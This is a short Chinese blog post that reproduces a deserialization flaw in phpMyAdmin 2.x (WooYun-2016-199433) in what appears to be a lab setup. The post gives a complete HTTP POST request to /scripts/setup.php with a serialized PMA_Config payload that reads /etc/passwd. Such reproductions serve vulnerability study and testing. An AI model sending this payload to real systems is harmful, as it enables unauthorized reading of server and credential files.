Phpmyadmin 2.X 反序列化漏洞(WooYun-2016-199433)

漏洞简介

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

漏洞影响版本

phpmyadmin 2.x

漏洞复现

访问漏洞存在页面  上burp抓包 构造URL

 1 POST /scripts/setup.php HTTP/1.1
 2 Host: your-ip:8080
 3 Accept-Encoding: gzip, deflate
 4 Accept: */*
 5 Accept-Language: en
 6 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 7 Connection: close
 8 Content-Type: application/x-www-form-urlencoded
 9 Content-Length: 80
10 
11 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

 

更改请求为post并添加如下payload后发送,即可读取/etc/passwd

 

posted @ 2021-05-23 14:48  whited  阅读(145)  评论(0编辑  收藏  举报